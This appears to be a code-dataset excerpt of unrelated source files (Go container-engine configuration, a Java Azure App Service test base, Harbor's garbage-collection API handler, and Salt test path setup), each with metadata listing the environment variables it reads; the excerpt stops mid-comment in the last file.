logrus.Warningf("The cgroupv2 manager is set to systemd but there is no systemd user session available")
logrus.Warningf("For using systemd, you may need to login using an user session")
logrus.Warningf("Alternatively, you can enable lingering with: `loginctl enable-linger %d` (possibly as root)", unshare.GetRootlessUID())
logrus.Warningf("Falling back to --cgroup-manager=cgroupfs")
c.Engine.CgroupManager = CgroupfsCgroupsManager
}
}
func (c *Config) addCAPPrefix() {
toCAPPrefixed := func(cap string) string {
if !strings.HasPrefix(strings.ToLower(cap), "cap_") {
return "CAP_" + strings.ToUpper(cap)
}
return cap
}
for i, cap := range c.Containers.DefaultCapabilities {
c.Containers.DefaultCapabilities[i] = toCAPPrefixed(cap)
}
}
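// Illustrative note (editor's addition): addCAPPrefix normalizes entries such as
// "net_admin" or "SYS_ADMIN" in the default capability list to the kernel spelling
// "CAP_NET_ADMIN" / "CAP_SYS_ADMIN", while values already starting with "cap_"
// (in any letter case) are left untouched.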
// Validate is the main entry point for library configuration validation.
func (c *Config) Validate() error {
if err := c.Containers.Validate(); err != nil {
return errors.Wrap(err, "validating containers config")
}
if !c.Containers.EnableLabeling {
selinux.SetDisabled()
}
if err := c.Engine.Validate(); err != nil {
return errors.Wrap(err, "validating engine configs")
}
if err := c.Network.Validate(); err != nil {
return errors.Wrap(err, "validating network configs")
}
return nil
}
func (c *EngineConfig) findRuntime() string {
// Search for crun first followed by runc, kata, runsc
for _, name := range []string{"crun", "runc", "kata", "runsc"} {
for _, v := range c.OCIRuntimes[name] {
if _, err := os.Stat(v); err == nil {
return name
}
}
if path, err := exec.LookPath(name); err == nil {
logrus.Debugf("Found default OCI runtime %s path via PATH environment variable", path)
return name
}
}
return ""
}
// Validate is the main entry point for Engine configuration validation
// It returns an `error` on validation failure, otherwise
// `nil`.
func (c *EngineConfig) Validate() error {
if err := c.validatePaths(); err != nil {
return err
}
// Check if the pullPolicy from containers.conf is valid
// if it is invalid returns the error
pullPolicy := strings.ToLower(c.PullPolicy)
if _, err := ValidatePullPolicy(pullPolicy); err != nil {
return errors.Wrapf(err, "invalid pull type from containers.conf %q", c.PullPolicy)
}
return nil
}
// Validate is the main entry point for containers configuration validation
// It returns an `error` on validation failure, otherwise
// `nil`.
func (c *ContainersConfig) Validate() error {
if err := c.validateUlimits(); err != nil {
return err
}
if err := c.validateDevices(); err != nil {
return err
}
if err := c.validateTZ(); err != nil {
return err
}
if err := c.validateUmask(); err != nil {
return err
}
if c.LogSizeMax >= 0 && c.LogSizeMax < OCIBufSize {
return errors.Errorf("log size max should be negative or >= %d", OCIBufSize)
}
if _, err := units.FromHumanSize(c.ShmSize); err != nil {
return errors.Errorf("invalid --shm-size %s, %q", c.ShmSize, err)
}
return nil
}
// Validate is the main entry point for network configuration validation.
// It returns an `error` on validation failure, otherwise
// `nil`.
func (c *NetworkConfig) Validate() error {
expectedConfigDir := _cniConfigDir
if unshare.IsRootless() {
home, err := unshare.HomeDir()
if err != nil {
return err
}
expectedConfigDir = filepath.Join(home, _cniConfigDirRootless)
}
if c.NetworkConfigDir != expectedConfigDir {
err := isDirectory(c.NetworkConfigDir)
if err != nil && !os.IsNotExist(err) {
return errors.Wrapf(err, "invalid network_config_dir: %s", c.NetworkConfigDir)
}
}
if stringsEq(c.CNIPluginDirs, DefaultCNIPluginDirs) {
return nil
}
for _, pluginDir := range c.CNIPluginDirs {
if err := isDirectory(pluginDir); err == nil {
return nil
}
}
return errors.Errorf("invalid cni_plugin_dirs: %s", strings.Join(c.CNIPluginDirs, ","))
}
// FindConmon iterates over (*Config).ConmonPath and returns the path
// to the first (version) matching conmon binary. If none is found, we try
// to do a path lookup of "conmon".
func (c *Config) FindConmon() (string, error) {
foundOutdatedConmon := false
for _, path := range c.Engine.ConmonPath {
stat, err := os.Stat(path)
if err != nil {
continue
}
if stat.IsDir() {
continue
}
if err := probeConmon(path); err != nil {
logrus.Warnf("Conmon at %s invalid: %v", path, err)
foundOutdatedConmon = true
continue
}
logrus.Debugf("Using conmon: %q", path)
return path, nil
}
// Search the $PATH as last fallback
if path, err := exec.LookPath("conmon"); err == nil {
if err := probeConmon(path); err != nil {
logrus.Warnf("Conmon at %s is invalid: %v", path, err)
foundOutdatedConmon = true
} else {
logrus.Debugf("Using conmon from $PATH: %q", path)
return path, nil
}
}
if foundOutdatedConmon {
return "", errors.Wrapf(ErrConmonOutdated,
"please update to v%d.%d.%d or later",
_conmonMinMajorVersion, _conmonMinMinorVersion, _conmonMinPatchVersion)
}
return "", errors.Wrapf(ErrInvalidArg,
"could not find a working conmon binary (configured options: %v)",
c.Engine.ConmonPath)
}
// GetDefaultEnv returns the environment variables for the container.
// It will check the HTTPProxy and HostEnv booleans and add the appropriate
// environment variables to the container.
func (c *Config) GetDefaultEnv() []string {
return c.GetDefaultEnvEx(c.Containers.EnvHost, c.Containers.HTTPProxy)
}
// GetDefaultEnvEx returns the environment variables for the container.
// It will check the HTTPProxy and HostEnv boolean parameters and return the appropriate
// environment variables for the container.
func (c *Config) GetDefaultEnvEx(envHost, httpProxy bool) []string {
var env []string
if envHost {
env = append(env, os.Environ()...)
} else if httpProxy {
proxy := []string{"http_proxy", "https_proxy", "ftp_proxy", "no_proxy", "HTTP_PROXY", "HTTPS_PROXY", "FTP_PROXY", "NO_PROXY"}
for _, p := range proxy {
if val, ok := os.LookupEnv(p); ok {
env = append(env, fmt.Sprintf("%s=%s", p, val))
}
}
}
return append(env, c.Containers.Env...)
}
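// Illustrative note (editor's addition): with envHost=false and httpProxy=true,
// only the listed proxy variables that are present in the process environment are
// copied through; e.g. running under HTTPS_PROXY=http://proxy.local:3128
// (hypothetical value) yields "HTTPS_PROXY=http://proxy.local:3128" followed by
// any entries from Containers.Env in containers.conf.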
// Capabilities parses the Add and Drop capability lists and merges them with
// the default capabilities for the container.
func (c *Config) Capabilities(user string, addCapabilities, dropCapabilities []string) ([]string, error) {
userNotRoot := func(user string) bool {
if user == "" || user == "root" || user == "0" {
return false
}
return true
}
defaultCapabilities := c.Containers.DefaultCapabilities
if userNotRoot(user) {
defaultCapabilities = []string{}
}
return capabilities.MergeCapabilities(defaultCapabilities, addCapabilities, dropCapabilities)
}
// Device parses a device mapping string into src, dst and permissions strings.
// Valid values for device look like:
//	"/dev/sdc"
//	"/dev/sdc:/dev/xvdc"
//	"/dev/sdc:/dev/xvdc:rwm"
//	"/dev/sdc:rm"
func Device(device string) (src, dst, permissions string, err error) {
permissions = "rwm"
split := strings.Split(device, ":")
switch len(split) {
case 3:
if !IsValidDeviceMode(split[2]) {
return "", "", "", errors.Errorf("invalid device mode: %s", split[2])
}
permissions = split[2]
fallthrough
case 2:
if IsValidDeviceMode(split[1]) {
permissions = split[1]
} else {
if split[1] == "" || split[1][0] != '/' {
return "", "", "", errors.Errorf("invalid device mode: %s", split[1])
}
dst = split[1]
}
fallthrough
case 1:
if !strings.HasPrefix(split[0], "/dev/") {
return "", "", "", errors.Errorf("invalid device mode: %s", split[0])
}
src = split[0]
default:
return "", "", "", errors.Errorf("invalid device specification: %s", device)
}
if dst == "" {
dst = src
}
return src, dst, permissions, nil
}
// IsValidDeviceMode checks if the mode for a device is valid or not.
// A valid mode is a composition of r (read), w (write), and m (mknod).
func IsValidDeviceMode(mode string) bool {
var legalDeviceMode = map[rune]bool{
'r': true,
'w': true,
'm': true,
}
if mode == "" {
return false
}
for _, c := range mode {
if !legalDeviceMode[c] {
return false
}
legalDeviceMode[c] = false
}
return true
}
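// deviceUsageSketch is an editor-added illustrative sketch (an assumption, not part
// of the upstream package): it shows how Device splits the accepted mapping forms.
// fmt is already imported by this file.
func deviceUsageSketch() {
	for _, spec := range []string{"/dev/sdc", "/dev/sdc:/dev/xvdc", "/dev/sdc:/dev/xvdc:rwm"} {
		src, dst, perm, err := Device(spec)
		if err != nil {
			continue // malformed specification
		}
		// For the bare "/dev/sdc" form, dst defaults to src and permissions to "rwm".
		fmt.Printf("%s -> %s (%s)\n", src, dst, perm)
	}
}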
// resolveHomeDir converts a path referencing the home directory via "~"
// to an absolute path
func resolveHomeDir(path string) (string, error) {
// check if the path references the home dir to avoid work
// don't use strings.HasPrefix(path, "~") as this doesn't match "~" alone
// use strings.HasPrefix(...) to not match "something/~/something"
if !(path == "~" || strings.HasPrefix(path, "~/")) {
// path does not reference home dir -> Nothing to do
return path, nil
}
// only get HomeDir when necessary
home, err := unshare.HomeDir()
if err != nil {
return "", err
}
// replace the first "~" (start of path) with the HomeDir to resolve "~"
return strings.Replace(path, "~", home, 1), nil
}
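// Illustrative note (editor's addition): with a hypothetical home directory of
// /home/alice, resolveHomeDir("~/containers") yields "/home/alice/containers",
// while "something/~/x" and plain relative paths are returned unchanged.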
func rootlessConfigPath() (string, error) {
if configHome := os.Getenv("XDG_CONFIG_HOME"); configHome != "" {
return filepath.Join(configHome, _configPath), nil
}
home, err := unshare.HomeDir()
if err != nil {
return "", err
}
return filepath.Join(home, UserOverrideContainersConfig), nil
}
func stringsEq(a, b []string) bool {
if len(a) != len(b) {
return false
}
for i := range a {
if a[i] != b[i] {
return false
}
}
return true
}
var (
configErr error
configMutex sync.Mutex
config *Config
)
// Default returns the default container config.
// Configuration will be read from the following files, in this order:
// * /usr/share/containers/containers.conf
// * /etc/containers/containers.conf
// * $HOME/.config/containers/containers.conf # When run in rootless mode
// Fields in later files override defaults set in previous files and the
// default config.
// None of these files are required, and not all fields need to be specified
// in each file, only the fields you want to override.
// The system default container config files can be overridden using the
// CONTAINERS_CONF environment variable. This is usually done for testing.
func Default() (*Config, error) {
configMutex.Lock()
defer configMutex.Unlock()
if config != nil || configErr != nil {
return config, configErr
}
return defConfig()
}
func defConfig() (*Config, error) {
config, configErr = NewConfig("")
return config, configErr
}
func Path() string {
if path := os.Getenv("CONTAINERS_CONF"); path != "" {
return path
}
if unshare.IsRootless() {
if rpath, err := rootlessConfigPath(); err == nil {
return rpath
}
return "$HOME/" + UserOverrideContainersConfig
}
return OverrideContainersConfig
}
// ReadCustomConfig reads the custom config and only generates a config based on it.
// If the custom config file does not exist, the function returns an empty config.
func ReadCustomConfig() (*Config, error) {
path, err := customConfigFile()
if err != nil {
return nil, err
}
newConfig := &Config{}
if _, err := os.Stat(path); err == nil {
if err := readConfigFromFile(path, newConfig); err != nil {
return nil, err
}
} else {
if !os.IsNotExist(err) {
return nil, err
}
}
return newConfig, nil
}
// Write writes the configuration to the default file
func (c *Config) Write() error {
var err error
path, err := customConfigFile()
if err != nil {
return err
}
if err := os.MkdirAll(filepath.Dir(path), 0755); err != nil {
return err
}
configFile, err := os.OpenFile(path, os.O_CREATE|os.O_RDWR|os.O_TRUNC, 0644)
if err != nil {
return err
}
defer configFile.Close()
enc := toml.NewEncoder(configFile)
if err := enc.Encode(c); err != nil {
return err
}
return nil
}
// Reload cleans the cached config and reloads the configuration from containers.conf files.
// This function is meant to be used for long-running processes that need to reload potential changes made to
// the cached containers.conf files.
func Reload() (*Config, error) {
configMutex.Lock()
defer configMutex.Unlock()
return defConfig()
}
func (c *Config) ActiveDestination() (uri, identity string, err error) {
if uri, found := os.LookupEnv("CONTAINER_HOST"); found {
if v, found := os.LookupEnv("CONTAINER_SSHKEY"); found {
identity = v
}
return uri, identity, nil
}
connEnv := os.Getenv("CONTAINER_CONNECTION")
switch {
case connEnv != "":
d, found := c.Engine.ServiceDestinations[connEnv]
if !found {
return "", "", errors.Errorf("environment variable CONTAINER_CONNECTION=%q service destination not found", connEnv)
}
return d.URI, d.Identity, nil
case c.Engine.ActiveService != "":
d, found := c.Engine.ServiceDestinations[c.Engine.ActiveService]
if !found {
return "", "", errors.Errorf("%q service destination not found", c.Engine.ActiveService)
}
return d.URI, d.Identity, nil
case c.Engine.RemoteURI != "":
return c.Engine.RemoteURI, c.Engine.RemoteIdentity, nil
}
return "", "", errors.New("no service destination configured")
}
// FindHelperBinary searches for the given binary name in the configured directories.
// If searchPATH is set to true it will also search in $PATH.
func (c *Config) FindHelperBinary(name string, searchPATH bool) (string, error) {
dir_list := c.Engine.HelperBinariesDir
// If set, search this directory first. This is used in testing.
if dir, found := os.LookupEnv("CONTAINERS_HELPER_BINARY_DIR"); found {
dir_list = append([]string{dir}, dir_list...)
}
for _, path := range dir_list {
fullpath := filepath.Join(path, name)
if fi, err := os.Stat(fullpath); err == nil && fi.Mode().IsRegular() {
return fullpath, nil
}
}
if searchPATH {
return exec.LookPath(name)
}
configHint := "To resolve this error, set the helper_binaries_dir key in the `[engine]` section of containers.conf to the directory containing your helper binaries."
if len(c.Engine.HelperBinariesDir) == 0 {
return "", errors.Errorf("could not find %q because there are no helper binary directories configured. %s", name, configHint)
}
return "", errors.Errorf("could not find %q in one of %v. %s", name, c.Engine.HelperBinariesDir, configHint)
}
// ImageCopyTmpDir returns the default directory to store temporary image files during copy
func (c *Config) ImageCopyTmpDir() (string, error) {
if path, found := os.LookupEnv("TMPDIR"); found {
return path, nil
}
switch c.Engine.ImageCopyTmpDir {
case "":
return "", nil
case "storage":
return filepath.Join(c.Engine.graphRoot, "tmp"), nil
default:
if filepath.IsAbs(c.Engine.ImageCopyTmpDir) {
return c.Engine.ImageCopyTmpDir, nil
}
}
return "", errors.Errorf("invalid image_copy_tmp_dir value %q (relative paths are not accepted)", c.Engine.ImageCopyTmpDir)
}
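// Illustrative note (editor's addition): precedence here is TMPDIR first, then the
// configured image_copy_tmp_dir; the special value "storage" resolves to
// <graphRoot>/tmp, any other value must be an absolute path, and relative paths
// are rejected with an error.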
// setupEnv sets the environment variables for the engine
func (c *Config) setupEnv() error {
for _, env := range c.Engine.Env {
splitEnv := strings.SplitN(env, "=", 2)
if len(splitEnv) != 2 {
logrus.Warnf("invalid environment variable for engine %s, valid configuration is KEY=value pair", env)
continue
}
// skip if the env is already defined
if _, ok := os.LookupEnv(splitEnv[0]); ok {
logrus.Debugf("environment variable %s is already defined, skip the settings from containers.conf", splitEnv[0])
continue
}
if err := os.Setenv(splitEnv[0], splitEnv[1]); err != nil {
return err
}
}
return nil
}
|
[
"\"CONTAINERS_CONF\"",
"\"DBUS_SESSION_BUS_ADDRESS\"",
"\"XDG_CONFIG_HOME\"",
"\"CONTAINERS_CONF\"",
"\"CONTAINER_CONNECTION\""
] |
[] |
[
"CONTAINER_CONNECTION",
"DBUS_SESSION_BUS_ADDRESS",
"XDG_CONFIG_HOME",
"CONTAINERS_CONF"
] |
[]
|
["CONTAINER_CONNECTION", "DBUS_SESSION_BUS_ADDRESS", "XDG_CONFIG_HOME", "CONTAINERS_CONF"]
|
go
| 4 | 0 | |
sdk/appservice/mgmt/src/test/java/com/azure/resourcemanager/appservice/AppServiceTest.java
|
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
package com.azure.resourcemanager.appservice;
import com.azure.core.annotation.BodyParam;
import com.azure.core.annotation.ExpectedResponses;
import com.azure.core.annotation.Get;
import com.azure.core.annotation.Host;
import com.azure.core.annotation.HostParam;
import com.azure.core.annotation.PathParam;
import com.azure.core.annotation.Post;
import com.azure.core.annotation.ServiceInterface;
import com.azure.core.http.HttpPipeline;
import com.azure.core.http.HttpPipelineBuilder;
import com.azure.core.http.policy.HttpLogDetailLevel;
import com.azure.core.http.policy.HttpLogOptions;
import com.azure.core.http.policy.HttpLoggingPolicy;
import com.azure.core.http.policy.RetryPolicy;
import com.azure.core.http.rest.Response;
import com.azure.core.http.rest.RestProxy;
import com.azure.core.http.rest.SimpleResponse;
import com.azure.core.util.FluxUtil;
import com.azure.resourcemanager.appservice.implementation.AppServiceManager;
import com.azure.resourcemanager.keyvault.implementation.KeyVaultManager;
import com.azure.resourcemanager.resources.core.TestBase;
import com.azure.resourcemanager.resources.fluentcore.arm.CountryIsoCode;
import com.azure.resourcemanager.resources.fluentcore.arm.CountryPhoneCode;
import com.azure.resourcemanager.resources.fluentcore.arm.Region;
import com.azure.resourcemanager.resources.fluentcore.profile.AzureProfile;
import com.azure.resourcemanager.resources.ResourceManager;
import java.io.IOException;
import java.io.InputStream;
import java.net.MalformedURLException;
import java.net.URL;
import java.nio.ByteBuffer;
import java.nio.charset.StandardCharsets;
import java.time.temporal.ChronoUnit;
import org.apache.commons.net.ftp.FTP;
import org.apache.commons.net.ftp.FTPClient;
import org.junit.jupiter.api.Assertions;
import reactor.core.publisher.Flux;
import reactor.core.publisher.Mono;
/** The base for app service tests. */
public class AppServiceTest extends TestBase {
protected ResourceManager resourceManager;
protected KeyVaultManager keyVaultManager;
protected AppServiceManager appServiceManager;
protected AppServiceDomain domain;
protected AppServiceCertificateOrder certificateOrder;
protected String rgName = "";
// private static OkHttpClient httpClient = new OkHttpClient.Builder().readTimeout(3, TimeUnit.MINUTES).build();
public AppServiceTest() {
}
AppServiceTest(RunCondition runCondition) {
super(runCondition);
}
@Override
protected void initializeClients(HttpPipeline httpPipeline, AzureProfile profile) {
rgName = generateRandomResourceName("javacsmrg", 20);
resourceManager =
ResourceManager.authenticate(httpPipeline, profile).withSdkContext(sdkContext).withDefaultSubscription();
keyVaultManager = KeyVaultManager.authenticate(httpPipeline, profile, sdkContext);
appServiceManager = AppServiceManager.authenticate(httpPipeline, profile, sdkContext);
// useExistingDomainAndCertificate();
// createNewDomainAndCertificate();
}
@Override
protected void cleanUpResources() {
resourceManager.resourceGroups().beginDeleteByName(rgName);
}
private void useExistingDomainAndCertificate() {
String rgName = "rgnemv24d683784f51d";
String certOrder = "wild2crt8b42374211";
String domainName = "jsdk79877.com";
if (System.getenv("appservice-group") != null) {
rgName = System.getenv("appservice-group");
}
if (System.getenv("appservice-domain") != null) {
domainName = System.getenv("appservice-domain");
}
if (System.getenv("appservice-certificateorder") != null) {
certOrder = System.getenv("appservice-certificateorder");
}
domain = appServiceManager.domains().getByResourceGroup(rgName, domainName);
certificateOrder = appServiceManager.certificateOrders().getByResourceGroup(rgName, certOrder);
}
private void createNewDomainAndCertificate() {
domain =
appServiceManager
.domains()
.define(System.getenv("appservice-domain"))
.withExistingResourceGroup(System.getenv("appservice-group"))
.defineRegistrantContact()
.withFirstName("Jon")
.withLastName("Doe")
.withEmail("[email protected]")
.withAddressLine1("123 4th Ave")
.withCity("Redmond")
.withStateOrProvince("WA")
.withCountry(CountryIsoCode.UNITED_STATES)
.withPostalCode("98052")
.withPhoneCountryCode(CountryPhoneCode.UNITED_STATES)
.withPhoneNumber("4258828080")
.attach()
.withDomainPrivacyEnabled(true)
.withAutoRenewEnabled(true)
.create();
certificateOrder =
appServiceManager
.certificateOrders()
.define(System.getenv("appservice-certificateorder"))
.withExistingResourceGroup(System.getenv("appservice-group"))
.withHostName("*." + domain.name())
.withWildcardSku()
.withDomainVerification(domain)
.withNewKeyVault("graphvault", Region.US_WEST)
.withValidYears(1)
.create();
}
/**
* Uploads a file to an Azure web app.
*
* @param profile the publishing profile for the web app.
* @param fileName the name of the file on the server
* @param file the local file
*/
public static void uploadFileToWebApp(PublishingProfile profile, String fileName, InputStream file) {
FTPClient ftpClient = new FTPClient();
String[] ftpUrlSegments = profile.ftpUrl().split("/", 2);
String server = ftpUrlSegments[0];
String path = "./site/wwwroot/webapps";
if (fileName.contains("/")) {
int lastslash = fileName.lastIndexOf('/');
path = path + "/" + fileName.substring(0, lastslash);
fileName = fileName.substring(lastslash + 1);
}
try {
ftpClient.connect(server);
ftpClient.login(profile.ftpUsername(), profile.ftpPassword());
ftpClient.setFileType(FTP.BINARY_FILE_TYPE);
for (String segment : path.split("/")) {
if (!ftpClient.changeWorkingDirectory(segment)) {
ftpClient.makeDirectory(segment);
ftpClient.changeWorkingDirectory(segment);
}
}
ftpClient.storeFile(fileName, file);
ftpClient.disconnect();
} catch (IOException e) {
e.printStackTrace();
}
}
protected Response<String> curl(String urlString) throws IOException {
try {
return stringResponse(httpClient.getString(getHost(urlString), getPathAndQuery(urlString))).block();
} catch (MalformedURLException e) {
Assertions.fail();
return null;
}
}
protected String post(String urlString, String body) {
try {
return stringResponse(httpClient.postString(getHost(urlString), getPathAndQuery(urlString), body))
.block()
.getValue();
} catch (Exception e) {
return null;
}
}
private static Mono<SimpleResponse<String>> stringResponse(Mono<SimpleResponse<Flux<ByteBuffer>>> responseMono) {
return responseMono
.flatMap(
response ->
FluxUtil
.collectBytesInByteBufferStream(response.getValue())
.map(bytes -> new String(bytes, StandardCharsets.UTF_8))
.map(
str ->
new SimpleResponse<>(
response.getRequest(), response.getStatusCode(), response.getHeaders(), str)));
}
private static String getHost(String urlString) throws MalformedURLException {
URL url = new URL(urlString);
String protocol = url.getProtocol();
String host = url.getAuthority();
return protocol + "://" + host;
}
private static String getPathAndQuery(String urlString) throws MalformedURLException {
URL url = new URL(urlString);
String path = url.getPath();
String query = url.getQuery();
if (query != null && !query.isEmpty()) {
path = path + "?" + query;
}
return path;
}
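// Illustrative note (editor's addition): for a URL such as
// "https://myapp.azurewebsites.net/api/items?limit=5" (hypothetical), getHost()
// returns "https://myapp.azurewebsites.net" and getPathAndQuery() returns
// "/api/items?limit=5", which are the two pieces the WebAppTestClient proxy expects.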
protected WebAppTestClient httpClient =
RestProxy
.create(
WebAppTestClient.class,
new HttpPipelineBuilder()
.policies(
new HttpLoggingPolicy(new HttpLogOptions().setLogLevel(HttpLogDetailLevel.BODY_AND_HEADERS)),
new RetryPolicy("Retry-After", ChronoUnit.SECONDS))
.build());
@Host("{$host}")
@ServiceInterface(name = "WebAppTestClient")
private interface WebAppTestClient {
@Get("{path}")
@ExpectedResponses({200, 400, 404})
Mono<SimpleResponse<Flux<ByteBuffer>>> getString(
@HostParam("$host") String host, @PathParam(value = "path", encoded = true) String path);
@Post("{path}")
@ExpectedResponses({200, 400, 404})
Mono<SimpleResponse<Flux<ByteBuffer>>> postString(
@HostParam("$host") String host,
@PathParam(value = "path", encoded = true) String path,
@BodyParam("text/plain") String body);
}
}
|
[
"\"appservice-group\"",
"\"appservice-group\"",
"\"appservice-domain\"",
"\"appservice-domain\"",
"\"appservice-certificateorder\"",
"\"appservice-certificateorder\"",
"\"appservice-domain\"",
"\"appservice-group\"",
"\"appservice-certificateorder\"",
"\"appservice-group\""
] |
[] |
[
"appservice-group",
"appservice-certificateorder",
"appservice-domain"
] |
[]
|
["appservice-group", "appservice-certificateorder", "appservice-domain"]
|
java
| 3 | 0 | |
src/core/api/reg_gc.go
|
// Copyright 2018 Project Harbor Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package api
import (
"errors"
"net/http"
"os"
"strconv"
common_job "github.com/goharbor/harbor/src/common/job"
"github.com/goharbor/harbor/src/core/api/models"
)
// GCAPI handles requests of Harbor GC.
type GCAPI struct {
AJAPI
}
// Prepare validates the URL and params; it requires system admin permission.
func (gc *GCAPI) Prepare() {
gc.BaseController.Prepare()
if !gc.SecurityCtx.IsAuthenticated() {
gc.SendUnAuthorizedError(errors.New("UnAuthorized"))
return
}
if !gc.SecurityCtx.IsSysAdmin() {
gc.SendForbiddenError(errors.New(gc.SecurityCtx.GetUsername()))
return
}
}
// Post creates a cron schedule or a manual trigger for GC, according to the request.
// create a daily schedule for GC
// {
// "schedule": {
// "type": "Daily",
// "cron": "0 0 0 * * *"
// }
// }
// create a manual trigger for GC
// {
// "schedule": {
// "type": "Manual"
// }
// }
func (gc *GCAPI) Post() {
ajr := models.AdminJobReq{}
isValid, err := gc.DecodeJSONReqAndValidate(&ajr)
if !isValid {
gc.SendBadRequestError(err)
return
}
ajr.Name = common_job.ImageGC
ajr.Parameters = map[string]interface{}{
"redis_url_reg": os.Getenv("_REDIS_URL_REG"),
}
gc.submit(&ajr)
gc.Redirect(http.StatusCreated, strconv.FormatInt(ajr.ID, 10))
}
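// gcJobParameters is an editor-added illustrative sketch (an assumption, not part of
// Harbor's API): both Post and Put build the same parameter map, so the job service
// receives the registry's Redis URL taken from the _REDIS_URL_REG environment variable.
func gcJobParameters() map[string]interface{} {
	return map[string]interface{}{
		"redis_url_reg": os.Getenv("_REDIS_URL_REG"),
	}
}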
// Put handles GC cron schedule update/delete.
// Request: delete the schedule of GC
// {
// "schedule": {
// "type": "None",
// "cron": ""
// }
// }
func (gc *GCAPI) Put() {
ajr := models.AdminJobReq{}
isValid, err := gc.DecodeJSONReqAndValidate(&ajr)
if !isValid {
gc.SendBadRequestError(err)
return
}
ajr.Name = common_job.ImageGC
ajr.Parameters = map[string]interface{}{
"redis_url_reg": os.Getenv("_REDIS_URL_REG"),
}
gc.updateSchedule(ajr)
}
// GetGC ...
func (gc *GCAPI) GetGC() {
id, err := gc.GetInt64FromPath(":id")
if err != nil {
gc.SendInternalServerError(errors.New("need to specify gc id"))
return
}
gc.get(id)
}
// List returns the top 10 GC executions, including both manual and cron ones.
func (gc *GCAPI) List() {
gc.list(common_job.ImageGC)
}
// Get gets GC schedule ...
func (gc *GCAPI) Get() {
gc.getSchedule(common_job.ImageGC)
}
// GetLog ...
func (gc *GCAPI) GetLog() {
id, err := gc.GetInt64FromPath(":id")
if err != nil {
gc.SendBadRequestError(errors.New("invalid ID"))
return
}
gc.getLog(id)
}
|
[
"\"_REDIS_URL_REG\"",
"\"_REDIS_URL_REG\""
] |
[] |
[
"_REDIS_URL_REG"
] |
[]
|
["_REDIS_URL_REG"]
|
go
| 1 | 0 | |
tests/support/paths.py
|
"""
:codeauthor: Pedro Algarvio ([email protected])
:copyright: Copyright 2017 by the SaltStack Team, see AUTHORS for more details.
:license: Apache 2.0, see LICENSE for more details.
tests.support.paths
~~~~~~~~~~~~~~~~~~~
Tests related paths
"""
import logging
import os
import re
import sys
import tempfile
import salt.utils.path
log = logging.getLogger(__name__)
TESTS_DIR = os.path.dirname(
os.path.dirname(os.path.normpath(os.path.abspath(__file__)))
)
if TESTS_DIR.startswith("//"):
# Have we been given an initial double forward slash? Ditch it!
TESTS_DIR = TESTS_DIR[1:]
if sys.platform.startswith("win"):
TESTS_DIR = os.path.normcase(TESTS_DIR)
CODE_DIR = os.path.dirname(TESTS_DIR)
if sys.platform.startswith("win"):
CODE_DIR = CODE_DIR.replace("\\", "\\\\")
UNIT_TEST_DIR = os.path.join(TESTS_DIR, "unit")
INTEGRATION_TEST_DIR = os.path.join(TESTS_DIR, "integration")
MULTIMASTER_TEST_DIR = os.path.join(TESTS_DIR, "multimaster")
# Let's inject CODE_DIR so salt is importable if not there already
if TESTS_DIR in sys.path:
sys.path.remove(TESTS_DIR)
if CODE_DIR in sys.path and sys.path[0] != CODE_DIR:
sys.path.remove(CODE_DIR)
if CODE_DIR not in sys.path:
sys.path.insert(0, CODE_DIR)
if TESTS_DIR not in sys.path:
sys.path.insert(1, TESTS_DIR)
SYS_TMP_DIR = os.path.abspath(
os.path.realpath(
# Avoid ${TMPDIR} and gettempdir() on MacOS as they yield a base path too long
# for unix sockets: ``error: AF_UNIX path too long``
# Gentoo Portage prefers ebuild tests are rooted in ${TMPDIR}
os.environ.get("TMPDIR", tempfile.gettempdir())
if not sys.platform.startswith("darwin")
else "/tmp"
)
)
TMP = os.path.join(SYS_TMP_DIR, "salt-tests-tmpdir")
TMP_ROOT_DIR = os.path.join(TMP, "rootdir")
FILES = os.path.join(INTEGRATION_TEST_DIR, "files")
BASE_FILES = os.path.join(INTEGRATION_TEST_DIR, "files", "file", "base")
PROD_FILES = os.path.join(INTEGRATION_TEST_DIR, "files", "file", "prod")
PYEXEC = "python{}.{}".format(*sys.version_info)
MOCKBIN = os.path.join(INTEGRATION_TEST_DIR, "mockbin")
SCRIPT_DIR = os.path.join(CODE_DIR, "scripts")
TMP_STATE_TREE = os.path.join(SYS_TMP_DIR, "salt-temp-state-tree")
TMP_PILLAR_TREE = os.path.join(SYS_TMP_DIR, "salt-temp-pillar-tree")
TMP_PRODENV_STATE_TREE = os.path.join(SYS_TMP_DIR, "salt-temp-prodenv-state-tree")
TMP_PRODENV_PILLAR_TREE = os.path.join(SYS_TMP_DIR, "salt-temp-prodenv-pillar-tree")
TMP_CONF_DIR = TMP_MINION_CONF_DIR = os.path.join(TMP, "config")
TMP_SUB_MINION_CONF_DIR = os.path.join(TMP_CONF_DIR, "sub-minion")
TMP_SYNDIC_MINION_CONF_DIR = os.path.join(TMP_CONF_DIR, "syndic-minion")
TMP_SYNDIC_MASTER_CONF_DIR = os.path.join(TMP_CONF_DIR, "syndic-master")
TMP_MM_CONF_DIR = TMP_MM_MINION_CONF_DIR = os.path.join(TMP_CONF_DIR, "multimaster")
TMP_MM_SUB_CONF_DIR = TMP_MM_SUB_MINION_CONF_DIR = os.path.join(
TMP_CONF_DIR, "sub-multimaster"
)
TMP_PROXY_CONF_DIR = TMP_CONF_DIR
CONF_DIR = os.path.join(INTEGRATION_TEST_DIR, "files", "conf")
PILLAR_DIR = os.path.join(FILES, "pillar")
TMP_SCRIPT_DIR = os.path.join(TMP, "scripts")
ENGINES_DIR = os.path.join(FILES, "engines")
LOG_HANDLERS_DIR = os.path.join(FILES, "log_handlers")
def list_test_mods():
"""
A generator which returns all of the test files
"""
test_re = re.compile(r"^test_.+\.py$")
for dirname in (UNIT_TEST_DIR, INTEGRATION_TEST_DIR, MULTIMASTER_TEST_DIR):
test_type = os.path.basename(dirname)
for root, _, files in salt.utils.path.os_walk(dirname):
parent_mod = root[len(dirname) :].lstrip(os.sep).replace(os.sep, ".")
for filename in files:
if test_re.match(filename):
mod_name = test_type
if parent_mod:
mod_name += "." + parent_mod
mod_name += "." + filename[:-3]
yield mod_name
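# Illustrative note (editor's addition): list_test_mods() yields dotted module names
# derived from the test tree, e.g. "unit.test_module" or
# "integration.modules.test_state" (hypothetical names), which callers can feed to a
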